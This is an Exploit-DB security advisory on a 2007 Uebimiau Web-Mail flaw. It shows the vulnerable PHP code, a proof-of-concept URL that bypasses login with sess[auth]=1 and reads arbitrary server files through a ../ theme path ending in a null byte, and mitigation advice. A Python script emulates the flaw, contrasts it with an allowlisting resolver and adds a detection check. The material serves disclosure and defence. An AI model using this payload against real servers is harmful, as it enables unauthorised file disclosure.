Vendor: Uebimiau Web-Mail
By: Eugene Minaev
CVSS: N/A
Type: Remote File Reader
Product Name: Uebimiau Web-Mail
Patch Exists: NO
Year: 2007

Uebimiau Web-Mail Remote File Reader

Uebimiau Web-Mail is vulnerable to local file disclosure (the advisory calls it a "remote file reader") when PHP's register_globals setting is enabled. Every script initialises its login state from globals, so an attacker who supplies f_pass and sess[auth]=1 in the query string passes the session check without credentials. The error.php script then calls extract($_GET), which lets the same request overwrite $selected_theme; that value is concatenated unchecked into the Smarty template path, so a ../ sequence ending in a %00 null byte (accepted in file paths by PHP versions of the time) makes the script read an arbitrary file on the server as a template.

Mitigation:

Set register_globals = Off in php.ini (it has been off by default since PHP 4.2 and was removed in PHP 5.4) and fix the code: do not call extract($_GET), do not accept $sess or $f_pass from the request as proof of authentication, and validate $selected_theme against the list of installed themes before using it in a template path. This page does not identify a fixed Uebimiau release; if the vendor publishes one, upgrade, but the configuration and code changes above remove the exposure regardless.

Exploit-DB raw data:

----[ Uebimiau Web-Mail Remote File Reader ... ITDefence.ru Antichat.ru ]

							Uebimiau Web-Mail Remote File Reader
							Eugene Minaev underwater@itdefence.ru
				___________________________________________________________________
			____/  __ __ _______________________ _______  _______________    \  \   \
			/ .\  /  /_// //              /        \       \/      __       \   /__/   /
			/ /     /_//              /\        /       /      /         /     /___/
			\/        /              / /       /       /\     /         /         /
			/        /               \/       /       / /    /         /__       //\
			\       /    ____________/       /        \/    __________// /__    // /   
			/\\      \_______/        \________________/____/  2007    /_//_/   // //\
			\ \\                                                               // // /
			.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / . 
			. \_\\________[________________________________________]_________//_//_/ . .
		 
		
First I looked at the login handling. Every script includes this code:

<?php
if(strlen($f_pass) > 0) {
...
} elseif ($sess["auth"] && intval((time()-$start)/60) < $idle_timeout) {
    // with register_globals on, $sess, $start and $idle_timeout can all
    // be supplied by the client in the query string
    $UM->mail_user   = $f_user    = $sess["user"];
    $UM->mail_pass   = $f_pass    = $sess["pass"];
    $UM->mail_server = $f_server  = $sess["server"];
    $UM->mail_email  = $f_email   = $sess["email"];
} else {
    Header("Location: ./index.php?tid=$tid&lid=$lid\r\n");
    exit;
}
?>

So, if register_globals is on, a request such as script.php?f_pass=+toxa+&sess[auth]=1 makes the script treat us as an authorized user. I then went through each script looking for something interesting.

<?php
define("SMARTY_DIR","./smarty/");
require_once(SMARTY_DIR."Smarty.class.php");
$smarty = new Smarty;
$smarty->compile_dir = $temporary_directory;
$smarty->security=true;
$smarty->secure_dir=array("./");
$smarty->assign("umLanguageFile",$selected_language.".txt");
?>

This looks promising, but $selected_language is already defined before this point, so it cannot be overridden from the request here. There is, however, similar code that calls extract() on the request, and that lets us read local files on the server:

<?php
if($phpver >= 4.1) {
    extract($_GET);   // every GET parameter overwrites a global of the same
                      // name, including $selected_theme
}

$smarty->assign("umSid",$sid);
$smarty->assign("umLid",$lid);
$smarty->assign("umTid",$tid);

$smarty->assign("umErrorCode",$err);

$smarty->display("$selected_theme/error.htm");   // attacker-controlled path
?>

Proof of concept (the %00 null byte truncates the path at the filesystem level, so the trailing "/error.htm" is dropped; PHP before 5.3.4 accepted null bytes in file paths):

http://test1.ru/uebimiau/error.php?f_pass=blackybr&sess[auth]=1&selected_theme=../ksuri.php%00
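The following Python script is an added example; it is not part of the advisory and not Uebimiau's code. It emulates what register_globals and extract($_GET) do to the proof-of-concept query above (every parameter becomes a variable, sess[auth]=1 becomes an array entry), resolves the template path the way the vulnerable error.php does, including the null-byte truncation, and contrasts it with a resolver that allowlists the theme and confines the result to the template directory, which is the code-level fix the Mitigation section calls for. It also includes a small query-string check of the kind a log review would use. The template root, the theme names and the assumption that Smarty templates are resolved by concatenating the template directory and the requested name are assumptions for illustration, not facts from the page.

```python
import posixpath
from urllib.parse import parse_qsl

# Constructed from the advisory's proof-of-concept URL; not captured traffic.
POC_QUERY = "f_pass=blackybr&sess[auth]=1&selected_theme=../ksuri.php%00"

# Assumed layout for illustration; Uebimiau's real template path is not on the page.
TEMPLATE_ROOT = "/var/www/uebimiau/themes"
INSTALLED_THEMES = ("default", "classic")  # assumed allowlist of installed themes


def php_globals(query: str) -> dict:
    """Emulate register_globals / extract($_GET): each GET parameter becomes a
    variable named after it, and name[key]=value becomes an array element.
    %00 is decoded to a real NUL byte, exactly as PHP did."""
    globals_ = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.endswith("]") and "[" in name:
            base, key = name[:-1].split("[", 1)
            globals_.setdefault(base, {})[key] = value
        else:
            globals_[name] = value
    return globals_


def vulnerable_template_path(g: dict, default_theme: str = "default") -> str:
    """What error.php ends up opening: "$selected_theme/error.htm" appended to
    the template root, with $selected_theme taken from the request if present.
    PHP before 5.3.4 handed the string to the C library, which stops at the
    first NUL, so everything after %00 (here "/error.htm") is dropped."""
    selected_theme = g.get("selected_theme", default_theme)
    requested = f"{selected_theme}/error.htm"
    truncated = requested.split("\x00", 1)[0]
    return posixpath.normpath(TEMPLATE_ROOT + "/" + truncated)


def escapes_template_root(path: str) -> bool:
    """True when a resolved path lies outside TEMPLATE_ROOT."""
    return not path.startswith(TEMPLATE_ROOT + "/")


def safe_template_path(g: dict, default_theme: str = "default") -> str:
    """Hardened resolver: never trust a theme name from the request blindly.
    Reject NUL bytes, require an installed theme, and check containment of the
    normalised path as a second line of defence."""
    selected_theme = g.get("selected_theme", default_theme)
    if "\x00" in selected_theme or selected_theme not in INSTALLED_THEMES:
        raise ValueError(f"rejected theme {selected_theme!r}")
    path = posixpath.normpath(TEMPLATE_ROOT + "/" + selected_theme + "/error.htm")
    if escapes_template_root(path):
        raise ValueError("template path escapes the template root")
    return path


def safe_resolver_rejects(g: dict) -> bool:
    """Convenience wrapper: does the hardened resolver refuse this request?"""
    try:
        safe_template_path(g)
    except ValueError:
        return True
    return False


def suspicious_indicators(query: str) -> list:
    """Cheap log-side check for this attack pattern in a query string: session
    fields injected as parameters, NUL bytes, or traversal in the theme name."""
    g = php_globals(query)
    reasons = []
    if isinstance(g.get("sess"), dict):
        reasons.append("sess[] supplied by client")
    theme = g.get("selected_theme", "")
    if "\x00" in theme:
        reasons.append("NUL byte in selected_theme")
    if ".." in theme.split("/"):
        reasons.append("directory traversal in selected_theme")
    return reasons


if __name__ == "__main__":
    g = php_globals(POC_QUERY)
    print("globals after extract($_GET):", g)
    print("vulnerable resolver opens:", vulnerable_template_path(g))
    print("hardened resolver rejects request:", safe_resolver_rejects(g))
    print("indicators:", suspicious_indicators(POC_QUERY))
```

Run it as a script to see the advisory's request resolve to a file one directory above the template root under the vulnerable logic, and to see the allowlisting resolver refuse the same request. The containment check in safe_template_path is deliberately redundant with the allowlist: if someone later relaxes the allowlist, the path check still blocks traversal.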
		
		
		

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

# milw0rm.com [2008-01-06]